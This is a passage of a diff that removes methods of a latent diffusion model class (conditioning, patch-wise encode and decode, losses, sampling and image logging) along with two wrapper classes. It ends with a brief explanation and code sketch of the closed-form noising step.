- fold_params = dict(kernel_size=kernel_size, dilation=1, padding=0, stride=stride)
- unfold = torch.nn.Unfold(**fold_params)
-
- fold_params2 = dict(kernel_size=(kernel_size[0] // df, kernel_size[0] // df),
- dilation=1, padding=0,
- stride=(stride[0] // df, stride[1] // df))
- fold = torch.nn.Fold(output_size=(x.shape[2] // df, x.shape[3] // df), **fold_params2)
-
- weighting = self.get_weighting(kernel_size[0] // df, kernel_size[1] // df, Ly, Lx, x.device).to(x.dtype)
- normalization = fold(weighting).view(1, 1, h // df, w // df) # normalizes the overlap
- weighting = weighting.view((1, 1, kernel_size[0] // df, kernel_size[1] // df, Ly * Lx))
-
- else:
- raise NotImplementedError
-
- return fold, unfold, normalization, weighting
-
- @torch.no_grad()
- def get_input(self, batch, k, return_first_stage_outputs=False, force_c_encode=False,
- cond_key=None, return_original_cond=False, bs=None):
- x = super().get_input(batch, k)
- if bs is not None:
- x = x[:bs]
- x = x.to(self.device)
- encoder_posterior = self.encode_first_stage(x)
- z = self.get_first_stage_encoding(encoder_posterior).detach()
-
- if self.model.conditioning_key is not None:
- if cond_key is None:
- cond_key = self.cond_stage_key
- if cond_key != self.first_stage_key:
- if cond_key in ['caption', 'coordinates_bbox']:
- xc = batch[cond_key]
- elif cond_key == 'class_label':
- xc = batch
- else:
- xc = super().get_input(batch, cond_key).to(self.device)
- else:
- xc = x
- if not self.cond_stage_trainable or force_c_encode:
- if isinstance(xc, dict) or isinstance(xc, list):
- # import pudb; pudb.set_trace()
- c = self.get_learned_conditioning(xc)
- else:
- c = self.get_learned_conditioning(xc.to(self.device))
- else:
- c = xc
- if bs is not None:
- c = c[:bs]
-
- if self.use_positional_encodings:
- pos_x, pos_y = self.compute_latent_shifts(batch)
- ckey = __conditioning_keys__[self.model.conditioning_key]
- c = {ckey: c, 'pos_x': pos_x, 'pos_y': pos_y}
-
- else:
- c = None
- xc = None
- if self.use_positional_encodings:
- pos_x, pos_y = self.compute_latent_shifts(batch)
- c = {'pos_x': pos_x, 'pos_y': pos_y}
- out = [z, c]
- if return_first_stage_outputs:
- xrec = self.decode_first_stage(z)
- out.extend([x, xrec])
- if return_original_cond:
- out.append(xc)
- return out
-
- @torch.no_grad()
- def decode_first_stage(self, z, predict_cids=False, force_not_quantize=False):
- if predict_cids:
- if z.dim() == 4:
- z = torch.argmax(z.exp(), dim=1).long()
- z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)
- z = rearrange(z, 'b h w c -> b c h w').contiguous()
-
- z = 1. / self.scale_factor * z
-
- if hasattr(self, "split_input_params"):
- if self.split_input_params["patch_distributed_vq"]:
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
- uf = self.split_input_params["vqf"]
- bs, nc, h, w = z.shape
- if ks[0] > h or ks[1] > w:
- ks = (min(ks[0], h), min(ks[1], w))
- print("reducing Kernel")
-
- if stride[0] > h or stride[1] > w:
- stride = (min(stride[0], h), min(stride[1], w))
- print("reducing stride")
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(z, ks, stride, uf=uf)
-
- z = unfold(z) # (bn, nc * prod(**ks), L)
- # 1. Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- # 2. apply model loop over last dim
- if isinstance(self.first_stage_model, VQModelInterface):
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i],
- force_not_quantize=predict_cids or force_not_quantize)
- for i in range(z.shape[-1])]
- else:
-
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i])
- for i in range(z.shape[-1])]
-
- o = torch.stack(output_list, axis=-1) # # (bn, nc, ks[0], ks[1], L)
- o = o * weighting
- # Reverse 1. reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- decoded = fold(o)
- decoded = decoded / normalization # norm is shape (1, 1, h, w)
- return decoded
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- # same as above but without decorator
- def differentiable_decode_first_stage(self, z, predict_cids=False, force_not_quantize=False):
- if predict_cids:
- if z.dim() == 4:
- z = torch.argmax(z.exp(), dim=1).long()
- z = self.first_stage_model.quantize.get_codebook_entry(z, shape=None)
- z = rearrange(z, 'b h w c -> b c h w').contiguous()
-
- z = 1. / self.scale_factor * z
-
- if hasattr(self, "split_input_params"):
- if self.split_input_params["patch_distributed_vq"]:
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
- uf = self.split_input_params["vqf"]
- bs, nc, h, w = z.shape
- if ks[0] > h or ks[1] > w:
- ks = (min(ks[0], h), min(ks[1], w))
- print("reducing Kernel")
-
- if stride[0] > h or stride[1] > w:
- stride = (min(stride[0], h), min(stride[1], w))
- print("reducing stride")
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(z, ks, stride, uf=uf)
-
- z = unfold(z) # (bn, nc * prod(**ks), L)
- # 1. Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- # 2. apply model loop over last dim
- if isinstance(self.first_stage_model, VQModelInterface):
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i],
- force_not_quantize=predict_cids or force_not_quantize)
- for i in range(z.shape[-1])]
- else:
-
- output_list = [self.first_stage_model.decode(z[:, :, :, :, i])
- for i in range(z.shape[-1])]
-
- o = torch.stack(output_list, axis=-1) # # (bn, nc, ks[0], ks[1], L)
- o = o * weighting
- # Reverse 1. reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- decoded = fold(o)
- decoded = decoded / normalization # norm is shape (1, 1, h, w)
- return decoded
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- else:
- if isinstance(self.first_stage_model, VQModelInterface):
- return self.first_stage_model.decode(z, force_not_quantize=predict_cids or force_not_quantize)
- else:
- return self.first_stage_model.decode(z)
-
- @torch.no_grad()
- def encode_first_stage(self, x):
- if hasattr(self, "split_input_params"):
- if self.split_input_params["patch_distributed_vq"]:
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
- df = self.split_input_params["vqf"]
- self.split_input_params['original_image_size'] = x.shape[-2:]
- bs, nc, h, w = x.shape
- if ks[0] > h or ks[1] > w:
- ks = (min(ks[0], h), min(ks[1], w))
- print("reducing Kernel")
-
- if stride[0] > h or stride[1] > w:
- stride = (min(stride[0], h), min(stride[1], w))
- print("reducing stride")
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(x, ks, stride, df=df)
- z = unfold(x) # (bn, nc * prod(**ks), L)
- # Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- output_list = [self.first_stage_model.encode(z[:, :, :, :, i])
- for i in range(z.shape[-1])]
-
- o = torch.stack(output_list, axis=-1)
- o = o * weighting
-
- # Reverse reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- decoded = fold(o)
- decoded = decoded / normalization
- return decoded
-
- else:
- return self.first_stage_model.encode(x)
- else:
- return self.first_stage_model.encode(x)
-
- def shared_step(self, batch, **kwargs):
- x, c = self.get_input(batch, self.first_stage_key)
- loss = self(x, c)
- return loss
-
- def forward(self, x, c, *args, **kwargs):
- t = torch.randint(0, self.num_timesteps, (x.shape[0],), device=self.device).long()
- if self.model.conditioning_key is not None:
- assert c is not None
- if self.cond_stage_trainable:
- c = self.get_learned_conditioning(c)
- if self.shorten_cond_schedule: # TODO: drop this option
- tc = self.cond_ids[t].to(self.device)
- c = self.q_sample(x_start=c, t=tc, noise=torch.randn_like(c.float()))
- return self.p_losses(x, c, t, *args, **kwargs)
-
- def _rescale_annotations(self, bboxes, crop_coordinates): # TODO: move to dataset
- def rescale_bbox(bbox):
- x0 = clamp((bbox[0] - crop_coordinates[0]) / crop_coordinates[2])
- y0 = clamp((bbox[1] - crop_coordinates[1]) / crop_coordinates[3])
- w = min(bbox[2] / crop_coordinates[2], 1 - x0)
- h = min(bbox[3] / crop_coordinates[3], 1 - y0)
- return x0, y0, w, h
-
- return [rescale_bbox(b) for b in bboxes]
-
- def apply_model(self, x_noisy, t, cond, return_ids=False):
-
- if isinstance(cond, dict):
- # hybrid case, cond is expected to be a dict
- pass
- else:
- if not isinstance(cond, list):
- cond = [cond]
- key = 'c_concat' if self.model.conditioning_key == 'concat' else 'c_crossattn'
- cond = {key: cond}
-
- if hasattr(self, "split_input_params"):
- assert len(cond) == 1 # todo can only deal with one conditioning atm
- assert not return_ids
- ks = self.split_input_params["ks"] # eg. (128, 128)
- stride = self.split_input_params["stride"] # eg. (64, 64)
-
- h, w = x_noisy.shape[-2:]
-
- fold, unfold, normalization, weighting = self.get_fold_unfold(x_noisy, ks, stride)
-
- z = unfold(x_noisy) # (bn, nc * prod(**ks), L)
- # Reshape to img shape
- z = z.view((z.shape[0], -1, ks[0], ks[1], z.shape[-1])) # (bn, nc, ks[0], ks[1], L )
- z_list = [z[:, :, :, :, i] for i in range(z.shape[-1])]
-
- if self.cond_stage_key in ["image", "LR_image", "segmentation",
- 'bbox_img'] and self.model.conditioning_key: # todo check for completeness
- c_key = next(iter(cond.keys())) # get key
- c = next(iter(cond.values())) # get value
- assert (len(c) == 1) # todo extend to list with more than one elem
- c = c[0] # get element
-
- c = unfold(c)
- c = c.view((c.shape[0], -1, ks[0], ks[1], c.shape[-1])) # (bn, nc, ks[0], ks[1], L )
-
- cond_list = [{c_key: [c[:, :, :, :, i]]} for i in range(c.shape[-1])]
-
- elif self.cond_stage_key == 'coordinates_bbox':
- assert 'original_image_size' in self.split_input_params, 'BoundingBoxRescaling is missing original_image_size'
-
- # assuming padding of unfold is always 0 and its dilation is always 1
- n_patches_per_row = int((w - ks[0]) / stride[0] + 1)
- full_img_h, full_img_w = self.split_input_params['original_image_size']
- # as we are operating on latents, we need the factor from the original image size to the
- # spatial latent size to properly rescale the crops for regenerating the bbox annotations
- num_downs = self.first_stage_model.encoder.num_resolutions - 1
- rescale_latent = 2 ** (num_downs)
-
- # get top-left positions of the patches as expected by the bbox tokenizer; therefore we
- # need to rescale the top-left patch coordinates to lie in (0, 1)
- tl_patch_coordinates = [(rescale_latent * stride[0] * (patch_nr % n_patches_per_row) / full_img_w,
- rescale_latent * stride[1] * (patch_nr // n_patches_per_row) / full_img_h)
- for patch_nr in range(z.shape[-1])]
-
- # patch_limits are tl_coord, width and height coordinates as (x_tl, y_tl, h, w)
- patch_limits = [(x_tl, y_tl,
- rescale_latent * ks[0] / full_img_w,
- rescale_latent * ks[1] / full_img_h) for x_tl, y_tl in tl_patch_coordinates]
- # patch_values = [(np.arange(x_tl,min(x_tl+ks, 1.)),np.arange(y_tl,min(y_tl+ks, 1.))) for x_tl, y_tl in tl_patch_coordinates]
-
- # tokenize crop coordinates for the bounding boxes of the respective patches
- patch_limits_tknzd = [torch.LongTensor(self.bbox_tokenizer._crop_encoder(bbox))[None].to(self.device)
- for bbox in patch_limits] # list of length l with tensors of shape (1, 2)
- print(patch_limits_tknzd[0].shape)
- # cut tknzd crop position from conditioning
- assert isinstance(cond, dict), 'cond must be dict to be fed into model'
- cut_cond = cond['c_crossattn'][0][..., :-2].to(self.device)
- print(cut_cond.shape)
-
- adapted_cond = torch.stack([torch.cat([cut_cond, p], dim=1) for p in patch_limits_tknzd])
- adapted_cond = rearrange(adapted_cond, 'l b n -> (l b) n')
- print(adapted_cond.shape)
- adapted_cond = self.get_learned_conditioning(adapted_cond)
- print(adapted_cond.shape)
- adapted_cond = rearrange(adapted_cond, '(l b) n d -> l b n d', l=z.shape[-1])
- print(adapted_cond.shape)
-
- cond_list = [{'c_crossattn': [e]} for e in adapted_cond]
-
- else:
- cond_list = [cond for i in range(z.shape[-1])] # Todo make this more efficient
-
- # apply model by loop over crops
- output_list = [self.model(z_list[i], t, **cond_list[i]) for i in range(z.shape[-1])]
- assert not isinstance(output_list[0],
- tuple) # todo: can't deal with multiple model outputs; check this never happens
-
- o = torch.stack(output_list, axis=-1)
- o = o * weighting
- # Reverse reshape to img shape
- o = o.view((o.shape[0], -1, o.shape[-1])) # (bn, nc * ks[0] * ks[1], L)
- # stitch crops together
- x_recon = fold(o) / normalization
-
- else:
- x_recon = self.model(x_noisy, t, **cond)
-
- if isinstance(x_recon, tuple) and not return_ids:
- return x_recon[0]
- else:
- return x_recon
-
- def _predict_eps_from_xstart(self, x_t, t, pred_xstart):
- return (extract_into_tensor(self.sqrt_recip_alphas_cumprod, t, x_t.shape) * x_t - pred_xstart) / \
- extract_into_tensor(self.sqrt_recipm1_alphas_cumprod, t, x_t.shape)
-
- def _prior_bpd(self, x_start):
- """
- Get the prior KL term for the variational lower-bound, measured in
- bits-per-dim.
- This term can't be optimized, as it only depends on the encoder.
- :param x_start: the [N x C x ...] tensor of inputs.
- :return: a batch of [N] KL values (in bits), one per batch element.
- """
- batch_size = x_start.shape[0]
- t = torch.tensor([self.num_timesteps - 1] * batch_size, device=x_start.device)
- qt_mean, _, qt_log_variance = self.q_mean_variance(x_start, t)
- kl_prior = normal_kl(mean1=qt_mean, logvar1=qt_log_variance, mean2=0.0, logvar2=0.0)
- return mean_flat(kl_prior) / np.log(2.0)
-
- def p_losses(self, x_start, cond, t, noise=None):
- noise = default(noise, lambda: torch.randn_like(x_start))
- x_noisy = self.q_sample(x_start=x_start, t=t, noise=noise)
- model_output = self.apply_model(x_noisy, t, cond)
-
- loss_dict = {}
- prefix = 'train' if self.training else 'val'
-
- if self.parameterization == "x0":
- target = x_start
- elif self.parameterization == "eps":
- target = noise
- else:
- raise NotImplementedError()
-
- loss_simple = self.get_loss(model_output, target, mean=False).mean([1, 2, 3])
- loss_dict.update({f'{prefix}/loss_simple': loss_simple.mean()})
-
- logvar_t = self.logvar[t].to(self.device)
- loss = loss_simple / torch.exp(logvar_t) + logvar_t
- # loss = loss_simple / torch.exp(self.logvar) + self.logvar
- if self.learn_logvar:
- loss_dict.update({f'{prefix}/loss_gamma': loss.mean()})
- loss_dict.update({'logvar': self.logvar.data.mean()})
-
- loss = self.l_simple_weight * loss.mean()
-
- loss_vlb = self.get_loss(model_output, target, mean=False).mean(dim=(1, 2, 3))
- loss_vlb = (self.lvlb_weights[t] * loss_vlb).mean()
- loss_dict.update({f'{prefix}/loss_vlb': loss_vlb})
- loss += (self.original_elbo_weight * loss_vlb)
- loss_dict.update({f'{prefix}/loss': loss})
-
- return loss, loss_dict
-
- def p_mean_variance(self, x, c, t, clip_denoised: bool, return_codebook_ids=False, quantize_denoised=False,
- return_x0=False, score_corrector=None, corrector_kwargs=None):
- t_in = t
- model_out = self.apply_model(x, t_in, c, return_ids=return_codebook_ids)
-
- if score_corrector is not None:
- assert self.parameterization == "eps"
- model_out = score_corrector.modify_score(self, model_out, x, t, c, **corrector_kwargs)
-
- if return_codebook_ids:
- model_out, logits = model_out
-
- if self.parameterization == "eps":
- x_recon = self.predict_start_from_noise(x, t=t, noise=model_out)
- elif self.parameterization == "x0":
- x_recon = model_out
- else:
- raise NotImplementedError()
-
- if clip_denoised:
- x_recon.clamp_(-1., 1.)
- if quantize_denoised:
- x_recon, _, [_, _, indices] = self.first_stage_model.quantize(x_recon)
- model_mean, posterior_variance, posterior_log_variance = self.q_posterior(x_start=x_recon, x_t=x, t=t)
- if return_codebook_ids:
- return model_mean, posterior_variance, posterior_log_variance, logits
- elif return_x0:
- return model_mean, posterior_variance, posterior_log_variance, x_recon
- else:
- return model_mean, posterior_variance, posterior_log_variance
-
- @torch.no_grad()
- def p_sample(self, x, c, t, clip_denoised=False, repeat_noise=False,
- return_codebook_ids=False, quantize_denoised=False, return_x0=False,
- temperature=1., noise_dropout=0., score_corrector=None, corrector_kwargs=None):
- b, *_, device = *x.shape, x.device
- outputs = self.p_mean_variance(x=x, c=c, t=t, clip_denoised=clip_denoised,
- return_codebook_ids=return_codebook_ids,
- quantize_denoised=quantize_denoised,
- return_x0=return_x0,
- score_corrector=score_corrector, corrector_kwargs=corrector_kwargs)
- if return_codebook_ids:
- raise DeprecationWarning("Support dropped.")
- model_mean, _, model_log_variance, logits = outputs
- elif return_x0:
- model_mean, _, model_log_variance, x0 = outputs
- else:
- model_mean, _, model_log_variance = outputs
-
- noise = noise_like(x.shape, device, repeat_noise) * temperature
- if noise_dropout > 0.:
- noise = torch.nn.functional.dropout(noise, p=noise_dropout)
- # no noise when t == 0
- nonzero_mask = (1 - (t == 0).float()).reshape(b, *((1,) * (len(x.shape) - 1)))
-
- if return_codebook_ids:
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise, logits.argmax(dim=1)
- if return_x0:
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise, x0
- else:
- return model_mean + nonzero_mask * (0.5 * model_log_variance).exp() * noise
-
- @torch.no_grad()
- def progressive_denoising(self, cond, shape, verbose=True, callback=None, quantize_denoised=False,
- img_callback=None, mask=None, x0=None, temperature=1., noise_dropout=0.,
- score_corrector=None, corrector_kwargs=None, batch_size=None, x_T=None, start_T=None,
- log_every_t=None):
- if not log_every_t:
- log_every_t = self.log_every_t
- timesteps = self.num_timesteps
- if batch_size is not None:
- b = batch_size if batch_size is not None else shape[0]
- shape = [batch_size] + list(shape)
- else:
- b = batch_size = shape[0]
- if x_T is None:
- img = torch.randn(shape, device=self.device)
- else:
- img = x_T
- intermediates = []
- if cond is not None:
- if isinstance(cond, dict):
- cond = {key: cond[key][:batch_size] if not isinstance(cond[key], list) else
- list(map(lambda x: x[:batch_size], cond[key])) for key in cond}
- else:
- cond = [c[:batch_size] for c in cond] if isinstance(cond, list) else cond[:batch_size]
-
- if start_T is not None:
- timesteps = min(timesteps, start_T)
- iterator = tqdm(reversed(range(0, timesteps)), desc='Progressive Generation',
- total=timesteps) if verbose else reversed(
- range(0, timesteps))
- if type(temperature) == float:
- temperature = [temperature] * timesteps
-
- for i in iterator:
- ts = torch.full((b,), i, device=self.device, dtype=torch.long)
- if self.shorten_cond_schedule:
- assert self.model.conditioning_key != 'hybrid'
- tc = self.cond_ids[ts].to(cond.device)
- cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))
-
- img, x0_partial = self.p_sample(img, cond, ts,
- clip_denoised=self.clip_denoised,
- quantize_denoised=quantize_denoised, return_x0=True,
- temperature=temperature[i], noise_dropout=noise_dropout,
- score_corrector=score_corrector, corrector_kwargs=corrector_kwargs)
- if mask is not None:
- assert x0 is not None
- img_orig = self.q_sample(x0, ts)
- img = img_orig * mask + (1. - mask) * img
-
- if i % log_every_t == 0 or i == timesteps - 1:
- intermediates.append(x0_partial)
- if callback: callback(i)
- if img_callback: img_callback(img, i)
- return img, intermediates
-
- @torch.no_grad()
- def p_sample_loop(self, cond, shape, return_intermediates=False,
- x_T=None, verbose=True, callback=None, timesteps=None, quantize_denoised=False,
- mask=None, x0=None, img_callback=None, start_T=None,
- log_every_t=None):
-
- if not log_every_t:
- log_every_t = self.log_every_t
- device = self.betas.device
- b = shape[0]
- if x_T is None:
- img = torch.randn(shape, device=device)
- else:
- img = x_T
-
- intermediates = [img]
- if timesteps is None:
- timesteps = self.num_timesteps
-
- if start_T is not None:
- timesteps = min(timesteps, start_T)
- iterator = tqdm(reversed(range(0, timesteps)), desc='Sampling t', total=timesteps) if verbose else reversed(
- range(0, timesteps))
-
- if mask is not None:
- assert x0 is not None
- assert x0.shape[2:3] == mask.shape[2:3] # spatial size has to match
-
- for i in iterator:
- ts = torch.full((b,), i, device=device, dtype=torch.long)
- if self.shorten_cond_schedule:
- assert self.model.conditioning_key != 'hybrid'
- tc = self.cond_ids[ts].to(cond.device)
- cond = self.q_sample(x_start=cond, t=tc, noise=torch.randn_like(cond))
-
- img = self.p_sample(img, cond, ts,
- clip_denoised=self.clip_denoised,
- quantize_denoised=quantize_denoised)
- if mask is not None:
- img_orig = self.q_sample(x0, ts)
- img = img_orig * mask + (1. - mask) * img
-
- if i % log_every_t == 0 or i == timesteps - 1:
- intermediates.append(img)
- if callback: callback(i)
- if img_callback: img_callback(img, i)
-
- if return_intermediates:
- return img, intermediates
- return img
-
- @torch.no_grad()
- def sample(self, cond, batch_size=16, return_intermediates=False, x_T=None,
- verbose=True, timesteps=None, quantize_denoised=False,
- mask=None, x0=None, shape=None,**kwargs):
- if shape is None:
- shape = (batch_size, self.channels, self.image_size, self.image_size)
- if cond is not None:
- if isinstance(cond, dict):
- cond = {key: cond[key][:batch_size] if not isinstance(cond[key], list) else
- list(map(lambda x: x[:batch_size], cond[key])) for key in cond}
- else:
- cond = [c[:batch_size] for c in cond] if isinstance(cond, list) else cond[:batch_size]
- return self.p_sample_loop(cond,
- shape,
- return_intermediates=return_intermediates, x_T=x_T,
- verbose=verbose, timesteps=timesteps, quantize_denoised=quantize_denoised,
- mask=mask, x0=x0)
-
- @torch.no_grad()
- def sample_log(self,cond,batch_size,ddim, ddim_steps,**kwargs):
-
- if ddim:
- ddim_sampler = DDIMSampler(self)
- shape = (self.channels, self.image_size, self.image_size)
- samples, intermediates =ddim_sampler.sample(ddim_steps,batch_size,
- shape,cond,verbose=False,**kwargs)
-
- else:
- samples, intermediates = self.sample(cond=cond, batch_size=batch_size,
- return_intermediates=True,**kwargs)
-
- return samples, intermediates
-
-
- @torch.no_grad()
- def log_images(self, batch, N=8, n_row=4, sample=True, ddim_steps=200, ddim_eta=1., return_keys=None,
- quantize_denoised=True, inpaint=True, plot_denoise_rows=False, plot_progressive_rows=True,
- plot_diffusion_rows=True, **kwargs):
-
- use_ddim = ddim_steps is not None
-
- log = dict()
- z, c, x, xrec, xc = self.get_input(batch, self.first_stage_key,
- return_first_stage_outputs=True,
- force_c_encode=True,
- return_original_cond=True,
- bs=N)
- N = min(x.shape[0], N)
- n_row = min(x.shape[0], n_row)
- log["inputs"] = x
- log["reconstruction"] = xrec
- if self.model.conditioning_key is not None:
- if hasattr(self.cond_stage_model, "decode"):
- xc = self.cond_stage_model.decode(c)
- log["conditioning"] = xc
- elif self.cond_stage_key in ["caption"]:
- xc = log_txt_as_img((x.shape[2], x.shape[3]), batch["caption"])
- log["conditioning"] = xc
- elif self.cond_stage_key == 'class_label':
- xc = log_txt_as_img((x.shape[2], x.shape[3]), batch["human_label"])
- log['conditioning'] = xc
- elif isimage(xc):
- log["conditioning"] = xc
- if ismap(xc):
- log["original_conditioning"] = self.to_rgb(xc)
-
- if plot_diffusion_rows:
- # get diffusion row
- diffusion_row = list()
- z_start = z[:n_row]
- for t in range(self.num_timesteps):
- if t % self.log_every_t == 0 or t == self.num_timesteps - 1:
- t = repeat(torch.tensor([t]), '1 -> b', b=n_row)
- t = t.to(self.device).long()
- noise = torch.randn_like(z_start)
- z_noisy = self.q_sample(x_start=z_start, t=t, noise=noise)
- diffusion_row.append(self.decode_first_stage(z_noisy))
-
- diffusion_row = torch.stack(diffusion_row) # n_log_step, n_row, C, H, W
- diffusion_grid = rearrange(diffusion_row, 'n b c h w -> b n c h w')
- diffusion_grid = rearrange(diffusion_grid, 'b n c h w -> (b n) c h w')
- diffusion_grid = make_grid(diffusion_grid, nrow=diffusion_row.shape[0])
- log["diffusion_row"] = diffusion_grid
-
- if sample:
- # get denoise row
- with self.ema_scope("Plotting"):
- samples, z_denoise_row = self.sample_log(cond=c,batch_size=N,ddim=use_ddim,
- ddim_steps=ddim_steps,eta=ddim_eta)
- # samples, z_denoise_row = self.sample(cond=c, batch_size=N, return_intermediates=True)
- x_samples = self.decode_first_stage(samples)
- log["samples"] = x_samples
- if plot_denoise_rows:
- denoise_grid = self._get_denoise_row_from_list(z_denoise_row)
- log["denoise_row"] = denoise_grid
-
- if quantize_denoised and not isinstance(self.first_stage_model, AutoencoderKL) and not isinstance(
- self.first_stage_model, IdentityFirstStage):
- # also display when quantizing x0 while sampling
- with self.ema_scope("Plotting Quantized Denoised"):
- samples, z_denoise_row = self.sample_log(cond=c,batch_size=N,ddim=use_ddim,
- ddim_steps=ddim_steps,eta=ddim_eta,
- quantize_denoised=True)
- # samples, z_denoise_row = self.sample(cond=c, batch_size=N, return_intermediates=True,
- # quantize_denoised=True)
- x_samples = self.decode_first_stage(samples.to(self.device))
- log["samples_x0_quantized"] = x_samples
-
- if inpaint:
- # make a simple center square
- b, h, w = z.shape[0], z.shape[2], z.shape[3]
- mask = torch.ones(N, h, w).to(self.device)
- # zeros will be filled in
- mask[:, h // 4:3 * h // 4, w // 4:3 * w // 4] = 0.
- mask = mask[:, None, ...]
- with self.ema_scope("Plotting Inpaint"):
-
- samples, _ = self.sample_log(cond=c,batch_size=N,ddim=use_ddim, eta=ddim_eta,
- ddim_steps=ddim_steps, x0=z[:N], mask=mask)
- x_samples = self.decode_first_stage(samples.to(self.device))
- log["samples_inpainting"] = x_samples
- log["mask"] = mask
-
- # outpaint
- with self.ema_scope("Plotting Outpaint"):
- samples, _ = self.sample_log(cond=c, batch_size=N, ddim=use_ddim,eta=ddim_eta,
- ddim_steps=ddim_steps, x0=z[:N], mask=mask)
- x_samples = self.decode_first_stage(samples.to(self.device))
- log["samples_outpainting"] = x_samples
-
- if plot_progressive_rows:
- with self.ema_scope("Plotting Progressives"):
- img, progressives = self.progressive_denoising(c,
- shape=(self.channels, self.image_size, self.image_size),
- batch_size=N)
- prog_row = self._get_denoise_row_from_list(progressives, desc="Progressive Generation")
- log["progressive_row"] = prog_row
-
- if return_keys:
- if np.intersect1d(list(log.keys()), return_keys).shape[0] == 0:
- return log
- else:
- return {key: log[key] for key in return_keys}
- return log
-
- def configure_optimizers(self):
- lr = self.learning_rate
- params = list(self.model.parameters())
- if self.cond_stage_trainable:
- print(f"{self.__class__.__name__}: Also optimizing conditioner params!")
- params = params + list(self.cond_stage_model.parameters())
- if self.learn_logvar:
- print('Diffusion model optimizing logvar')
- params.append(self.logvar)
- opt = torch.optim.AdamW(params, lr=lr)
- if self.use_scheduler:
- assert 'target' in self.scheduler_config
- scheduler = instantiate_from_config(self.scheduler_config)
-
- print("Setting up LambdaLR scheduler...")
- scheduler = [
- {
- 'scheduler': LambdaLR(opt, lr_lambda=scheduler.schedule),
- 'interval': 'step',
- 'frequency': 1
- }]
- return [opt], scheduler
- return opt
-
- @torch.no_grad()
- def to_rgb(self, x):
- x = x.float()
- if not hasattr(self, "colorize"):
- self.colorize = torch.randn(3, x.shape[1], 1, 1).to(x)
- x = nn.functional.conv2d(x, weight=self.colorize)
- x = 2. * (x - x.min()) / (x.max() - x.min()) - 1.
- return x
-
-
-class DiffusionWrapper(pl.LightningModule):
- def __init__(self, diff_model_config, conditioning_key):
- super().__init__()
- self.diffusion_model = instantiate_from_config(diff_model_config)
- self.conditioning_key = conditioning_key
- # self.conditioning_key = None
- assert self.conditioning_key in [None, 'concat', 'crossattn', 'hybrid', 'adm']
-
- def forward(self, x, t, c_concat: list = None, c_crossattn: list = None):
- if self.conditioning_key is None:
- out = self.diffusion_model(x, t)
- elif self.conditioning_key == 'concat':
- xc = torch.cat([x] + c_concat, dim=1)
- out = self.diffusion_model(xc, t)
- elif self.conditioning_key == 'crossattn':
- cc = torch.cat(c_crossattn, 1)
- out = self.diffusion_model(x, t, context=cc)
- elif self.conditioning_key == 'hybrid':
- xc = torch.cat([x] + c_concat, dim=1)
- cc = torch.cat(c_crossattn, 1)
- out = self.diffusion_model(xc, t, context=cc)
- elif self.conditioning_key == 'adm':
- cc = c_crossattn[0]
- out = self.diffusion_model(x, t, y=cc)
- else:
- raise NotImplementedError()
-
- return out
-
-
-class Layout2ImgDiffusion(LatentDiffusion):
- # TODO: move all layout-specific hacks to this class
- def __init__(self, cond_stage_key, *args, **kwargs):
- assert cond_stage_key == 'coordinates_bbox', 'Layout2ImgDiffusion only for cond_stage_key="coordinates_bbox"'
- super().__init__(cond_stage_key=cond_stage_key, *args, **kwargs)
-
- def log_images(self, batch, N=8, *args, **kwargs):
- logs = super().log_images(batch=batch, N=N, *args, **kwargs)
-
- key = 'train' if self.training else 'validation'
- dset = self.trainer.datamodule.datasets[key]
- mapper = dset.conditional_builders[self.cond_stage_key]
-
- bbox_imgs = []
- map_fn = lambda catno: dset.get_textual_label(dset.get_category_id(catno))
- for tknzd_bbox in batch[self.cond_stage_key][:N]:
- bboximg = mapper.plot(tknzd_bbox.detach().cpu(), map_fn, (256, 256))
- bbox_imgs.append(bboximg)
-
- cond_img = torch.stack(bbox_imgs, dim=0)
- logs['bbox_image'] = cond_img
- return logs
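The `DDPM` class above precomputes the cumulative alpha schedule in `register_schedule` and then uses it in `q_sample` to draw a noised sample in closed form, x_t = sqrt(alpha_bar_t) * x_0 + sqrt(1 - alpha_bar_t) * eps. Here is a self-contained sketch of just that step, using a plain linear ramp between the default `linear_start=1e-4` and `linear_end=2e-2` (an assumption; the repository's `make_beta_schedule` helper may build the schedule slightly differently). It is an independent illustration, not code taken from the file above.

```python
import torch

T = 1000
# Plain linear ramp between the default endpoints (illustrative assumption).
betas = torch.linspace(1e-4, 2e-2, T)
alphas_cumprod = torch.cumprod(1.0 - betas, dim=0)   # alpha_bar_t

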